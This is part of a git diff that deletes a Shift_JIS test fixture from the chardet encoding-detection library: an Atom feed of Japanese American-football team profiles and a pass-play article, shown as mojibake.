    \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/amefoot.net.xml b/chardet/tests/SHIFT_JIS/amefoot.net.xml deleted file mode 100644 index f348bb4..0000000 --- a/chardet/tests/SHIFT_JIS/amefoot.net.xml +++ /dev/null @@ -1,1147 +0,0 @@ - - - -ƒAƒƒtƒg.net ƒAƒƒƒJƒ“ƒtƒbƒgƒ{[ƒ‹₪•i׀‰מ - -2005-07-29T09:09:32Z -ƒAƒƒtƒg‘וD‚«lװ‚ּ‚½‚‚ּ’”ּx‰‡ƒTƒCƒgI -tag:www.amefoot.net,2005://2 -Movable Type -Copyright (c) 2005, shusaku - -‰F“s‹{ƒuƒƒCƒJ[ƒY - -2005-07-29T09:09:32Z -2005-07-29T09:05:33Z -tag:www.amefoot.net,2005://2.1450 -2005-07-29T09:05:33Z -‰F“s‹{ƒuƒƒCƒJ[ƒY ˆ“®ךF“ָ–״§‰F“s‹{s ˆ“®“תF||| ‘®ƒ... - -shusaku - -shusaku_18@ybb.ne.jp - -0500)ƒAƒƒtƒgƒ`[ƒ€׀‰מ - -‰F“s‹{ƒuƒƒCƒJ[ƒY

    -

    ˆ“®ךF“ָ–״§‰F“s‹{s

    -

    ˆ“®“תF|||

    -

    ‘®ƒ[ƒOF–kײ“ƒNƒ‰ƒuƒ`[ƒ€ƒtƒbƒgƒ{[ƒ‹ƒ[ƒO

    -

    URLFhttp://www3.ocn.ne.jp/~kawabey/breakers/

    ]]> -‰ה‚׃`[ƒ€‚ֵ‚ֽ¡‹Gˆך‚ֹם‚ֱ‚ִ‚­‚ך‚י V‚½‚ָƒƒ“ƒo[‚נ•וW‚µ‚‚·B

    -

    ƒAƒƒtƒg‚ֹ‘־‚·‚ימ”M‚נ©•ּׂ’†‚¾‚¯‚ֵ‚ֽ—}‚¦‚«‚ך‚ָ‚¢ ‚ ‚ָ‚½I ¥”סA„‚½‚¿‚ֶˆך‚ֹƒvƒ[‚µ‚‚¹‚ס‚©B

    -

    ‚²˜A—‚נ‚¨‘ׂ‚¿‚µ‚ִ‚¨‚ט‚‚·B

    -

     

    -

    ‘Iט‚נƒTƒ|[ƒg‚µ‚ִ‚¢‚½‚¾‚­ƒ}ƒl[ƒWƒƒ[‚נ•וW‚µ‚ִ‚‚·B

    -

    w¶‘ד‚ֹƒ}ƒl[ƒWƒƒ[‚נ‚µ‚ִ‚¢‚½•Aƒ}ƒlƒWƒƒ[‚נ‚ג‚ֱ‚ִ‚‚½‚¢• ‚¨‘ׂ‚¿‚µ‚ִ‚¨‚ט‚‚·B

    -

    ‚ג‚³‚µ‚¢ז”yƒ}ƒl[ƒWƒƒ[‚ׂ¨‚ט‚‚·‚ּ‚ֵA‚²S”z‚ ‚ט‚‚¹‚ס‚זB

    ]]> -
    -
    - -‘ז16‰סFƒAƒƒtƒg‚ּU‚ƒvƒ[(3)ƒpƒXƒvƒ[ - -2005-07-07T21:55:21Z -2005-07-02T21:38:30Z -tag:www.amefoot.net,2005://2.1420 -2005-07-02T21:38:30Z -‘ז16‰סFƒAƒƒtƒg‚ּU‚ƒvƒ[(3)ƒpƒXƒvƒ[ ¡‰ס‚ֽƒpƒXƒvƒ[‚ּ׀‰מ‚ֵ‚·BƒpƒX... - -shusaku - -shusaku_18@ybb.ne.jp - -0200)ƒAƒƒtƒg“–ו - -‘ז16‰סFƒAƒƒtƒg‚ּU‚ƒvƒ[(3)ƒpƒXƒvƒ[

    -

    ¡‰ס‚ֽƒpƒXƒvƒ[‚ּ׀‰מ‚ֵ‚·BƒpƒXƒvƒ[‚ֽƒ‰ƒ“ƒvƒ[ˆָד‚ֹ©—R“x‚ׂ‚­Aƒvƒ[’Pˆ‚ֵ׀‰מ‚·‚י‚ּ‚ֽ•s‰ֲ”\‚ֵ‚·B‚±‚±‚ֵ‚ֽA -‘ו‚‚©‚ָ•×—‚נ‚ ‚°‚½‚¢‚ֶv‚¢‚‚·B

    ]]> -’ם‚ּƒpƒXƒvƒ[‚ֵ‚ֽAƒNƒH[ƒ^[ƒoƒbƒN‚׃Zƒ“ƒ^[‚©‚חƒXƒiƒbƒv‚נף‚¯Aד‚כ‚ֹ‰÷‚ׂט‚‚·(ƒhƒƒbƒvƒoƒbƒN)B

    -

    ƒVƒ‡ƒbƒgƒKƒ“ƒtƒH[ƒ[ƒVƒ‡ƒ“‚ּ‚ז‚₪‚ֹA - ‰‚‚©‚חƒNƒH[ƒ^[ƒoƒbƒN‚×[‚¢ˆ’u‚ֹƒZƒbƒg‚µ‚ִ‚¢‚יך‡‚ֽ•‚ֵ‚·‚×A‚±‚ּƒhƒƒbƒvƒoƒbƒN‚ּ•א”‚ֹ‚ז‚טA -ƒpƒXƒvƒ[‚וח‚³‚ך‚י‚±‚ֶ‚ב½‚­‚ָ‚ֱ‚ִ‚¢‚‚·B

    -

    3•אE5•אE7•א‚ּ3ם—‚׈ך”“I‚ֵA -•א”‚ב½‚­‚ָ‚י‚‚ַƒƒV[ƒo[(ƒƒCƒhƒƒV[ƒo[‚גƒ^ƒCƒgƒGƒ“ƒh)‚×’·‚¢‹——£‚נ‘–‚י‚±‚ֶ‚ֵׂ‚«‚‚·B

    -

    ‹t‚ֹ¾‚¦‚־AƒƒV[ƒo[‚×’·‚­‘–‚י‚ֶ‚«‚ֽAƒNƒH[ƒ^[ƒoƒbƒN‚א[‚­‰÷‚ׂח‚ָ‚¢‚ֶA -ƒfƒBƒtƒFƒ“ƒXƒ‰ƒCƒ““™‚ּƒpƒXƒ‰ƒbƒVƒ…‚ֹ•‚‚ֱ‚ִ‚µ‚‚₪‚ּ‚ֵ‚·B

    -

     

    -

    ‚³‚ִA‚±‚±‚ֵ‚ֽA3•א‚ּƒpƒX‚נƒVƒ‡[ƒgƒpƒXA -5•א‚ּƒpƒX‚נƒ~ƒhƒ‹ƒpƒXA7•א‚ּƒpƒX‚נƒƒ“ƒOƒpƒX‚ִֶ‚ׁA‚»‚ך‚¼‚ך‚ּ—ב‚ֶ“ֱ’¥‚נ‚²׀‰מ‚¢‚½‚µ‚‚·B

    -

    ‚‚½A‚»‚ךˆָO‚ּ“ֱך‚ָƒpƒXƒvƒ[‚ֹ‚ֲ‚¢‚ִ‚אA‘±‚¯‚ִ‚²׀‰מ‚µ‚‚·B -

    -

     

    -

    16-1.ƒVƒ‡[ƒgƒpƒX

    -

    ƒNƒH[ƒ^[ƒoƒbƒN‚×3•א‚ֵƒ{[ƒ‹‚נ“‚°‚י‚½‚AƒƒV[ƒo[‚ּ‘–‚י‹——£‚ֽ’Z‚­A•’‚ֽ“‚°‚י‘ט(ƒpƒXƒ^[ƒQƒbƒg)‚אƒvƒ[‘O‚©‚חˆ‚‚ֱ‚ִ‚¢‚‚·B

    -

    ƒNƒH[ƒ^[ƒoƒbƒN‚ֽƒXƒiƒbƒv‚נף‚¯‚½’¼ד‚ֹA‚ ‚ח‚©‚¶‚–ס‘©‚³‚ך‚½ˆ’u‚ֹ“‚°AƒƒV[ƒo[‚ֽ–ס‘©‚³‚ך‚½ˆ’u‚ֹ‘–‚ט‚‚·B

    -

    ‚±‚ּ‚ז‚₪‚ָƒpƒX‚נuƒ^ƒCƒ~ƒ“ƒOEƒpƒXv‚ָ‚ַ‚ִֶ‚װ‚±‚ֶ‚א‚ ‚ט‚‚·B -

    -

    -

    ‚א‚¿‚כ‚סA‚±‚ך‚ֽˆך—ב‚ֵ‚ ‚טAƒ`[ƒ€‚ֹ‚ז‚ֱ‚ִ‚ֽ•¡”‚ּƒpƒXƒ^[ƒQƒbƒg‚נ“‚°•ׂ¯‚½‚טA -ƒƒV[ƒo[‚ׂ ‚י’צ“x’·‚¢‹——£‚נ‘–‚יך‡‚א‚ ‚ט‚‚·B

    -

    ’ם‚ֽ5`10ƒ„[ƒh‚­‚ח‚¢‚ּˆ’u‚ֵƒƒV[ƒo[‚׃Lƒƒƒbƒ`‚·‚יƒvƒ[‚ב½‚¢‚ֵ‚·B

    -

     

    -

    16-2.ƒ~ƒhƒ‹ƒpƒX

    -

    ƒNƒH[ƒ^[ƒoƒbƒN‚×5•א‰÷‚ׂי‚½‚AƒpƒXƒ^[ƒQƒbƒg‚נ•¡”‚ֹ‚µAƒfƒBƒtƒFƒ“ƒX‚ּ“®‚«‚נ©‚ְִ‚ֹ“‚°‚י‘ט‚נ”»’f‚·‚יװ‚ׂ ‚ט‚‚·B -

    -

    ƒƒV[ƒo[‚ּ‘–‚יƒR[ƒX‚ֽˆ‚‚ח‚ך‚ִ‚¢‚יך‡‚ב½‚­A•’‚ֽAƒfƒBƒtƒFƒ“ƒX‚ַׂ‚₪“®‚¢‚½‚ח‚ַ‚±‚ײ“‚°‚י‚©‚ֶ‚¢‚₪‚±‚ֶ‚אˆ‚‚ֱ‚ִ‚¢‚‚·B -

    -

    -

    ‚­‚ַ‚¢‚ז‚₪‚ֵ‚·‚×Aˆך—ב‚ֵ‚·B

    -

    ‚±‚ּ—ב‚ֵ‚ֽAƒIƒtƒFƒ“ƒX‚©‚ח©‚ִ‰EƒTƒCƒh‚ּƒƒCƒhƒƒV[ƒo[‚ֶƒ^ƒCƒgƒGƒ“ƒh‚׃pƒXƒ^[ƒQƒbƒg‚ֹ‚ָ‚ֱ‚ִ‚¨‚טA -ƒNƒH[ƒ^[ƒoƒbƒN‚ֽƒfƒBƒtƒFƒ“ƒX‚ּˆ’u‚נ‚‚ִA‹ף‚¢‚ִ‚¢‚י•‚ֹ“‚°‚‚·B

    -

     

    -

    16-3.ƒƒ“ƒOƒpƒX

    -

    ƒNƒH[ƒ^[ƒoƒbƒN‚×7•א‰÷‚ׂי‚ּ‚ֵA“‚°‚י‚‚ֵ‚ֹ‘“–‚ּװ‚ׂ ‚ט‚‚·B

    -

    ƒIƒtƒFƒ“ƒXƒ‰ƒCƒ““™‚ּƒpƒXƒvƒƒeƒNƒVƒ‡ƒ“‚א’·‚¢װ‚נ‚¿‚±‚½‚¦‚י•K—v‚ׂ ‚ט‚‚·B

    -

    ‚‚½AƒƒV[ƒo[‚ּƒR[ƒX‚ֽˆ‚‚ֱ‚ִ‚ֽ‚¢‚י‚א‚ּ‚ּA’·װ‚ּƒfƒBƒtƒFƒ“ƒX‚ּ“®‚«‚נ—\‘ׂ·‚י‚±‚ֶ‚ֽ•s‰ֲ”\‚ֹ‹‚¢‚ּ‚ֵAף‹µ‚נ‚‚ִA -ƒfƒBƒtƒFƒ“ƒX‚ּ‚¢‚ָ‚¢ך‚ֹ‘–‚ט‚‚·B

    -

    ƒNƒH[ƒ^[ƒoƒbƒN‚ֽAƒfƒBƒtƒFƒ“ƒXEƒƒV[ƒo[‚ּˆ’uײW‚נ©‚ִA“‚°‚י‘ט‚נ’T‚µ‚‚·B

    -

    -

    “‚°‚י ‚ֹ‚ֽAƒfƒBƒtƒFƒ“ƒX‚ּˆ’u‚ֽ‰‚‚ֶ‚ֽ‚©‚¯—£‚ך‚½‚א‚ּ‚ֹ‚ָ‚ֱ‚ִ‚¢‚י‚ּ‚ֵAƒIƒtƒFƒ“ƒX‘Sˆץ‚ּף‹µ”»’f‚×d—v‚ֵ‚·B

    -

    ¨‚ּ‹­‚¢ƒNƒH[ƒ^[ƒoƒbƒN‚ֵ‚ ‚ך‚־AƒXƒNƒƒ[ƒWƒ‰ƒCƒ“(ƒvƒ[Jnˆ’u)‚©‚ח50ƒ„[ƒhˆָד‚אז‚‚ֵ“‚°‚י‚±‚ֶ‚א‚ ‚ט‚‚·B -

    -

     

    -

    16-4.ƒtƒFƒCƒNƒpƒX(ƒvƒ[ƒAƒNƒVƒ‡ƒ“)

    -

    ‘O‰סA -ƒpƒXƒvƒ[‚ּ‚׃‚ט‚נ‚µ‚ְִ‚ֽƒ‰ƒ“ƒvƒ[‚ֶ‚¢‚₪Aƒhƒ[ƒvƒ[‚נ‚²׀‰מ‚µ‚‚µ‚½‚×A‚»‚ּ‹t‚ֹAƒ‰ƒ“ƒvƒ[‚ּ‚׃‚ט‚נ‚µ‚ִƒpƒX‚נ“‚°‚יƒvƒ[‚ׂ ‚ט‚‚·B -

    -

    ‚±‚ּ‚ז‚₪‚ָƒpƒXƒvƒ[‚נƒtƒFƒCƒNƒpƒX‚‚½‚ֽƒvƒ[ƒAƒNƒVƒ‡ƒ“‚ִֶ‚ׁ‚‚·B

    -

    -

    ƒfƒBƒtƒFƒ“ƒX‚×ATB‚ב–‚יƒ‰ƒ“ƒvƒ[‚¾‚ֶv‚ֱ‚ִ‘O‚ֹ“ֻ‚ֱ‚ס‚ֵ‚­‚י‚±‚ֶ‚נ‘_‚ֱ‚½ƒvƒ[‚ֵ‚·B

    -

    —lX‚ָƒ‰ƒ“ƒvƒ[‚ּƒtƒFƒCƒN‚©‚חƒpƒX‚נ“‚°‚י‚±‚ֶ‚ׂ ‚ט‚‚·B

    -

    (’FƒAƒƒtƒg‚ֵ‚ֽA“G‚נ‚¾‚‚·‚½‚‚ֹ‹U‚ט‚ּ“®ל‚נ‚·‚י‚±‚ֶ‚נuƒtƒFƒCƒNv‚ִֶ‚ׁ‚‚·BƒTƒbƒJ[‚ֵ‚¢‚₪ƒtƒFƒCƒ“ƒg‚ֹ‚ ‚½‚ט‚‚·B -)

    -

    ƒNƒH[ƒ^[ƒoƒbƒN‚×AƒtƒFƒCƒN‚ּ‚ ‚ֶ‚ֹ‘ו‚«‚­O‘₪‚ֹ‘–‚ֱ‚ִ“‚°‚י‚±‚ֶ‚א‚ ‚טA‚±‚ך‚נƒ[ƒ‹ƒAƒEƒg‚ִֶ‚ׁ‚‚·B

    -

    ‚±‚ך‚ֽAƒfƒBƒtƒFƒ“ƒX‚ּƒpƒXƒ‰ƒbƒVƒ…‚נ”נ‚¯‚ָ‚ׂחƒpƒX‚נ“‚°‚יƒeƒNƒjƒbƒN‚ֵ‚·B

    -

    ƒ`[ƒ€‚ֹ‚ז‚ֱ‚ִ‚ֽAƒtƒFƒCƒNƒpƒX‚ֵ‚ָ‚­‚ִ‚אƒ[ƒ‹ƒAƒEƒg‚נg‚₪ך‡‚ׂ ‚ט‚‚·B

    -

     

    -

    16-5.ƒXƒNƒ[ƒ“ƒpƒX

    -

    ƒtƒFƒCƒNƒpƒX“¯—lA“G‚נ‚¾‚‚·ƒpƒXƒvƒ[‚ֵ‚·B

    -

    ƒNƒH[ƒ^[ƒoƒbƒN‚ֽA5•א‚‚½‚ֽ7•א‚ּƒhƒƒbƒvƒoƒbƒN‚נ‚µ‚‚·B

    -

    ƒIƒtƒFƒ“ƒXƒ‰ƒCƒ“‚ֽƒpƒXƒvƒƒeƒNƒVƒ‡ƒ“‚נ¸”s‚µ‚½‚׃‚ט‚נ‚µ‚ִA‚ם‚´‚ֶƒfƒBƒtƒFƒ“ƒX‚נ’‚µ‚‚·B

    -

    ƒNƒH[ƒ^[ƒoƒbƒN‚ֽP‚ֱ‚ִ‚­‚י“G‚נ\•ֹׂˆר‚«‚ֲ‚¯‚ִ‚©‚חA‰¡‚ֹ‚¢‚יƒ‰ƒ“ƒjƒ“ƒOƒoƒbƒN‚ֹƒpƒX‚נ“‚°‚‚·B

    -

    -

    ‚±‚ּ—ב‚ֵ‚ֽAƒtƒ‹ƒoƒbƒN‚ׂ±‚ֱ‚»‚ט‰¡‚ֹo‚ִ‚«‚ִA -ƒNƒH[ƒ^[ƒoƒbƒN‚©‚חƒpƒX‚נף‚¯‚‚·B

    -

    ‚»‚ּװ‚ֹAƒK[ƒh‚ֶƒ^ƒbƒNƒ‹‚א‚±‚ֱ‚»‚ט‰¡‚ֹo‚ִ‚¢‚ִA -ƒtƒ‹ƒoƒbƒN‚נח‚ט‚ָ‚ׂח‘Oi‚µ‚‚·B

    -

    ƒƒV[ƒo[‚ֽAƒfƒBƒtƒFƒ“ƒVƒuƒoƒbƒN‚נ‰‚ֹ—U“±‚·‚י‚½‚‚ֹAˆך’¼‚ּƒpƒXƒR[ƒX‚נ‘–‚ֱ‚ִ‚¢‚‚·B

    -

    ƒhƒ[ƒvƒ[‚ֶ“¯‚¶‚ז‚₪‚ָˆ׃–¡‡‚¢‚נ‚ֱ‚ִ‚¢‚‚·‚×AƒpƒXƒ‰ƒbƒVƒ…‚ּl”‚ב½‚¢‚ֶ‚«‚ֹ‚ֽAƒXƒNƒ[ƒ“ƒpƒX‚ּ•‚×—Lר‚ֵ‚·B

    -

     

    -

     

    -

    ˆָד‚ֵAƒpƒXƒvƒ[‚ּ׀‰מ‚נI‚ם‚ט‚ֹ‚¢‚½‚µ‚‚·B

    -

    ‰ס‚ֽAח”ץ(ƒfƒBƒtƒFƒ“ƒX)‚ּƒeƒNƒjƒbƒN‚נ‚²׀‰מ‚µ‚‚·B

    ]]> -
    -
    - -’†‹‘וwƒƒbƒhƒpƒ“ƒT[ƒY - -2005-06-30T16:37:29Z -2005-06-29T14:42:36Z -tag:www.amefoot.net,2005://2.1418 -2005-06-29T14:42:36Z -’†‹‘וwƒƒbƒhƒpƒ“ƒT[ƒY ˆ“®ךFˆ₪’m§–L“cs ˆ“®“תFT6“ת ‘®ƒ[ƒOF“... - -shusaku - -shusaku_18@ybb.ne.jp - -50)“C’n• - -’†‹‘וwƒƒbƒhƒpƒ“ƒT[ƒY

    -

    ˆ“®ךFˆ₪’m§–L“cs

    -

    ˆ“®“תFT6“ת

    -

    ‘®ƒ[ƒOF“Cw¶1•”

    -

    URLFhttp://www.cnc.chukyo-u.ac.jp/users/football/red_panthers.html

    ]]> -„’BƒAƒƒƒJƒ“ƒtƒbƒgƒ{[ƒ‹•”‚ֽA‘Iט48–¼Aw¶ƒgƒ[ƒi[4–¼Aƒ}ƒl[ƒWƒƒ[4–¼‚ּ‡v56–¼‚ֵˆ“®‚µ‚ִ‚¢‚‚·B(2005”N6»)

    -

    ƒAƒƒtƒg‚ֶ‚¢‚₪ƒXƒ|[ƒc‚ֽAƒIƒtƒFƒ“ƒXEƒfƒCƒtƒFƒ“ƒX‚ֶ‚Q‚ֲ‚ּƒ`[ƒ€‚ׂ ‚ט‚‚·BƒLƒbƒN¥ƒIƒt‚ָ‚ַ‚ֶ‚¢‚ֱ‚½ƒLƒbƒN’†S‚ּƒvƒ[‚א‚ ‚טA - ‚P‡’†‚ֹ‘½‚­‚ּ‘Iט‚׈–פ‚µ‚‚·B

    -

    o±ׂ‚ֽ­‚ָ‚­A‚‚ֶ‚ס‚ַ‚ּ‘Iט‚׃[ƒ‚©‚ח‚ּƒXƒ^[ƒg‚ֵ‚·B“•”“–‚ֽ‰Sׂ‚ֵ‚אA -o±‚נֿ‚ס‚ֵ‚¢‚­–‚ֹ‚ז‚ֱ‚ִ“Cƒ[ƒO‚נ‘ד•\‚·‚י‘Iט‚ֹ‚ָ‚י‚±‚ֶ‚אo—ˆ‚‚·B

    -

    •”ˆץ‚ּ¸­‚ֶ‚¢‚₪ƒAƒƒtƒg‚ֹ‚ֶ‚ֱ‚ִ‚ֽµ‚µ‚¢»ְ‚נAƒ`[ƒ€ƒ[ƒN‚ֶ“תX‚ּ—KAƒR[ƒ`ƒ“ƒOƒXƒ^ƒbƒtEƒgƒ[ƒi[E -ƒ}ƒl[ƒWƒƒ[‚ּƒTƒ|[ƒg‚ֹx‚¦‚ח‚ך‚ָ‚ׂח•‚µAײ¼‚P•”ƒ[ƒO¸i‚נ–w‚µ‘Sˆץ‚׈ך‚ֶ‚ָ‚ֱ‚ִז’£‚ֱ‚ִ‚¢‚‚·B

    ]]> -
    -
    - -R`‘וwƒgƒ€ƒLƒƒƒbƒc - -2005-06-29T14:08:39Z -2005-06-29T14:04:22Z -tag:www.amefoot.net,2005://2.1417 -2005-06-29T14:04:22Z -R`‘וwƒgƒ€ƒLƒƒƒbƒc ˆ“®ךFR`§R`s ˆ“®“תF||| ‘®ƒ[ƒOF“–kw... - -shusaku - -shusaku_18@ybb.ne.jp - -20)“–k’n• - -R`‘וwƒgƒ€ƒLƒƒƒbƒc

    -

    ˆ“®ךFR`§R`s

    -

    ˆ“®“תF|||

    -

    ‘®ƒ[ƒOF“–kw¶ƒ[ƒO

    -

    URLFhttp://www.geocities.jp/koike48/

    ]]> -‚‚ָ‚³‚סA‚ֽ‚¶‚‚‚µ‚ִII

    -

    ‰ה‚×R`‘וwƒAƒƒƒJƒ“ƒtƒbƒgƒ{[ƒ‹•”‚ֵ‚ֽ‹₪‚ֹז’£‚ֱ‚ִ‚­‚ך‚י•”ˆץAƒ}ƒl[ƒWƒƒ[‚נ•וW‚µ‚ִ‚¢‚‚·B

    -

    “–kƒ[ƒO‚ֵ‚¿ד‚ׂי‚±‚ֶ‚נ–w‚µA“תX—K‚ֹז‚ט‘g‚ס‚ֵ‚¢‚‚·‚×A‚±‚ּ–•W‚נ’B¬‚·‚י‚½‚‚ֹA‚‚ָ‚³‚ס‚ּ—ֽ‚וK—v‚ֵ‚·II -

    -

    ƒAƒƒtƒg‚ֽ‘וw‚ֵn‚‚יl‚ב½‚¢‚ּ‚ֵo±‚ָׂ‚¢‚±‚ֶ‚ֽ‘S‘R‹C‚ֹ‚·‚י‚±‚ֶ‚ֽ‚ ‚ט‚‚¹‚סBְA -»•”ˆץ‚ּ‚‚ֶ‚ס‚ַ‚׃Aƒƒtƒg–¢o±ׂ‚ֵ‚·B

    -

    ‚‚½A‚s‚n‚l‚b‚`‚s‚r‚ּl‚½‚¿‚ֽ‚n‚aA‚n‚fAƒR[ƒ`‚נ‚A–”’‚¢l‚½‚¿‚־‚©‚ט‚ֵ‚·B

    -

    ­‚µ‚ֵ‚א‹»–¡‚ׂ ‚ֱ‚½‚ח‚¨‹Cy‚ֹ˜A—‰÷‚³‚¢B

    -

    ‚S”Nװ‚‚­’B‚ֶˆך‚ֹ‚ׂס‚־‚ט‚‚µ‚ו‚₪B

    ]]> -
    -
    - -ƒCƒƒ^ƒj ƒTƒCƒhƒƒCƒ“ƒ_[ƒY - -2005-06-29T13:39:25Z -2005-06-29T13:36:02Z -tag:www.amefoot.net,2005://2.1416 -2005-06-29T13:36:02Z -ƒCƒƒ^ƒj ƒTƒCƒhƒƒCƒ“ƒ_[ƒY ˆ“®ךF•÷ֹ§_ֻs ˆ“®“תF||| ‘®ƒ[ƒO... - -shusaku - -shusaku_18@ybb.ne.jp - -60)‹‹E’n• - -ƒCƒƒ^ƒj ƒTƒCƒhƒƒCƒ“ƒ_[ƒY

    -

    ˆ“®ךF•÷ֹ§_ֻs

    -

    ˆ“®“תF|||

    -

    ‘®ƒ[ƒOFXƒ[ƒOWest

    -

    URLFhttp://sidewinders.to/

    ]]> -2004”N‚ּ•K’B–•W‚ֹf‚°‚½uX2—DvAuˆך•”¸iv‚נ’B¬‚·‚י‚±‚ֶ‚ֵׂ‚«‚‚µ‚½B

    -

    ‚±‚ך‚א‚׀‚ֶ‚¦‚ֹAƒTƒCƒhƒƒCƒ“ƒ_[ƒY‚נ‰‰‡‚µ‚ִ‰÷‚³‚יF—l‚ֹ—ֽ‚ֳ‚¯‚ח‚ך‚½‚¨‰A‚ֵ‚ ‚י‚ֶ´׃‚µ‚ִ‚¨‚ט‚‚·B

    -

    1”N‚נo‚ִƒTƒCƒhƒƒCƒ“ƒ_[ƒY‚ִֽ‚ׁ‚w‚ּ•‘‘ה‚ֹ–‚ֱ‚ִ‚­‚י‚±‚ֶ‚ֵׂ‚«‚‚µ‚½B

    -

    ‚µ‚©‚µ‚±‚ך‚‚ֵ‚ֶ“¯—l‚ֹ‰÷ˆ’ב–ְ‚ֵ‚ֽ–‚ֱ‚ִ‚«‚½ˆ׃–¡‚ָׂ‚¢A‚ֶl‚¦‚ִ‚¨‚ט‚‚·B

    -

    u‚ג‚י‚©‚ח‚ֹ‚ֽ’¸“_‚נ–w‚·Bv

    -

    –{“–‚ּˆ׃–¡‚ּV¶ƒTƒCƒhƒƒCƒ“ƒ_[ƒY‚נ‚ז‚כ‚µ‚­‚¨ט‚¢‚¢‚½‚µ‚‚·B

    ]]> -
    -
    - -_ֻ‘וwƒƒCƒoƒ“ƒY - -2005-06-29T06:28:39Z -2005-06-29T06:25:32Z -tag:www.amefoot.net,2005://2.1415 -2005-06-29T06:25:32Z -_ֻ‘וwƒƒCƒoƒ“ƒY ˆ“®ךF•÷ֹ§_ֻs ˆ“®“תF||| ‘®ƒ[ƒOFײ¼w¶... - -shusaku - -shusaku_18@ybb.ne.jp - -60)‹‹E’n• - -_ֻ‘וwƒƒCƒoƒ“ƒY

    -

    ˆ“®ךF•÷ֹ§_ֻs

    -

    ˆ“®“תF|||

    -

    ‘®ƒ[ƒOFײ¼w¶1•”

    -

    URLFhttp://home.kobe-u.com/ravens/

    ]]> -_ֻ‘וwƒAƒƒƒJƒ“ƒtƒbƒgƒ{[ƒ‹•”‚q‚`‚u‚d‚m‚r‚ֽ”­‘«‚µ‚ִA29”N‚ֶײ¼ƒtƒbƒgƒ{[ƒ‹E‚ֵ‚א”הr“I—נj‚ּף‚¢ƒ`[ƒ€‚ֵ‚·B‚µ‚©‚µA -‚»‚ּ—נj‚ּ‚‚ֶ‚ס‚ַ‚נײ¼ˆך•”ƒ[ƒO‚ֵ‰‚²‚µA‰‹‚ֹ—Dף•ג‚ֹ‹“‚°‚ח‚ך‚½‚טA -‚`‚k‚k@‚i‚`‚o‚`‚m‚גײ¼ƒI[ƒ‹ƒXƒ^[‚ֹ‘½”‚ּ—DG‚ָ‘Iט‚נ”yo‚µ‚ִ‚¢‚‚·B

    -

    ‚µ‚©‚µAO‹­‚ִֶ‚־‚ך‚יײ¼w‰@‘וwA‹“s‘וwA—§–½‘וw‚נ‚ֽ‚¶‚‚ֶ‚·‚יˆך•”ƒ[ƒO‚ּ‹­‹Z‚½‚¿‚ֶם‚ֱ‚ִ‚¢‚­‚₪‚¦‚ֵA -ˆךl‚ֵ‚א‘½‚­‚ּl‚וK—v‚ֹ‚ָ‚ט‚‚·BƒXƒ|[ƒc„‘E§“x‚ּ‚ָ‚¢‰ה‚בוw‚ֵ‚ֽAƒtƒbƒgƒ{[ƒ‹–¢o±ׂ‚נ’†S‚ֹƒ`[ƒ€‚נל‚ֱ‚ִ‚«‚‚µ‚½B -

    -

    ‚»‚ּ’†‚ֹ‚ֽA‚‚ֱ‚½‚­ƒXƒ|[ƒco±‚ּ‚ָ‚¢ׂ‚א‚½‚­‚³‚ס‘¶‚µ‚ִ‚¢‚‚·B‚»‚ך‚ֵ‚א‚±‚ך‚‚ֵ‹P‚©‚µ‚¢¬ׁ‚נc‚µ‚ִ‚«‚½‚ּ‚ֽA -ƒAƒƒƒJƒ“ƒtƒbƒgƒ{[ƒ‹‚ֶ‚¢‚₪ƒXƒ|[ƒc‚×®‘S•׋ֶ§‚ֹ‚ז‚ֱ‚ִ¬‚ט—§‚ֱ‚ִ‚¨‚טA‘«‚ב¬‚¢A‘ּ‚בו‚«‚¢A¨‚׋­‚¢A -‚ֶ‚¢‚ֱ‚½©•ּׂ“ֱ’¥‚נL‚־‚µ‚ִ‚¢‚­‚±‚ֶ‚ֵƒgƒbƒvƒvƒ[ƒ„[‚ֶ‚ָ‚ך‚י‚©‚ח‚ֵ‚·B‚«‚ֱ‚©‚¯‚ֽ‚s‚u‚ֹ‰f‚ט‚½‚¢A‚©‚ֱ‚±‚ז‚³‚»‚₪A‹­‚¢‚©‚חA -—F’B‚×—~‚µ‚¢‚©‚חA‚ָ‚ַ‰½‚ֵ‚א‹\‚ֵ‚·B’·‚¢‚ז‚₪‚ֵ’Z‚¢‘וw‚S”NװA‚׀‚ֶ‚ֲ‚ּ‚א‚ּ‚ֹ‘ֵ‚¿‚ס‚ֵ‚‚‚¹‚ס‚©H

    ]]> -
    -
    - -R‘וwƒMƒƒƒ“ƒuƒ‰[ƒY - -2005-06-29T14:17:06Z -2005-06-29T05:55:30Z -tag:www.amefoot.net,2005://2.1414 -2005-06-29T05:55:30Z -R‘וwƒMƒƒƒ“ƒuƒ‰[ƒY ˆ“®ךFR§Rs ˆ“®“תFT5“ת ‘®ƒ[ƒOF’†‘... - -shusaku - -shusaku_18@ybb.ne.jp - -70)’†‘El‘’n• - -R‘וwƒMƒƒƒ“ƒuƒ‰[ƒY

    -

    ˆ“®ךFR§Rs

    -

    ˆ“®“תFT5“ת

    -

    ‘®ƒ[ƒOF’†‘l‘w¶1•”

    -

    URLFhttp://www.geocities.jp/gamblers_yu_gamblers/

    ]]> -„‚½‚¿AR‘וw‘ּˆח‰ןƒAƒƒƒJƒ“ƒtƒbƒgƒ{[ƒ‹•”GAMBLERS(ƒMƒƒƒ“ƒuƒ‰[ƒYj‚ֽ’†l‘w¶ƒ[ƒO‚ּ‚P•”ƒ[ƒO‚ֹ‘®‚µA -ƒ[ƒO—D‚נ–w‚µ‚ִ“תX—K‚ֹ—ד‚ס‚ֵ‚¢‚‚·B

    -

    —Kװ‚ֽA•½“ת‚ֽ‚P‚U‚S‚O•ׂ©‚חR‘וƒ‰ƒOƒr[ך‚ֹ‚ִ‚Qװ’צ“x—K‚µAT––‚ֹ‚ֽˆדw•”‚גHw•”‚ּl‚½‚¿‚ֶ‡“¯‚ֵ—K‚נs‚¢‚‚·B -

    -

